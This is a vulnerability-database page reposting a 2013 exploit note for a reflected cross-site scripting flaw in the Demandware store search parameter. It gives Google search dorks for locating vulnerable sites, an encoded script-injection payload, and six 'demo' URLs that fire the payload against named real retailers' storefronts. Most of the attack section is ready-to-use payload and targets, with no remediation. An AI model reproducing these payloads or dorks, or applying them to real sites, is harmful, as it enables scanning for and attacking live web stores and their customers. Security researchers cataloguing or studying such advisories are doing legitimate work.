Demandware Store XSS Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1045607 漏洞类型
发布时间 2013-02-18 更新时间 2013-02-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013020116
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Demandware Store XSS Vulnerability
# Date: 2013-02-10
# Author: Cyb3rgh0st aka Rajat
# Vendor or Software Link: http://www.demandware.com/
# Version: n/a
# Category: webapps/php
# Google Keywords: inurl:on/demandware.store/  or inurl:default/Search-Show?q=
# Tested on: Windows 7 and Backtrack rc3
#POC:

http://www.example.com/on/demandware.store/Sites-crocs_us-Site/default/Search-Show?q={/exploit/XSS}

exploit="1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E"(without quotes)

# Demo site:
1.http://www.crocs.com/on/demandware.store/Sites-crocs_us-Site/default/Search-Show?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E
2.http://www.sorel.com/on/demandware.store/Sites-Sorel_US-Site/default/Search-Show?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E
3.http://www.cpopowermatic.com/on/demandware.store/Sites-powermatic-Site/default/Search-Show?q=1%3b<%2fscript><script>alert(/xss/);</script>
4.http://www.elc.co.uk/on/demandware.store/Sites-ELCENGB-Site/default/Search-Show?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E
5.http://www.jochen-schweizer.de/on/demandware.store/Sites-JSShop-Site/default/Search-Show?q=1%3b<%2fscript><script>alert(/xss/);</script>
6.http://www.callawaygolfpreowned.com/search/results,default,sc.html?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E

#Greetz to Team Indishell !!!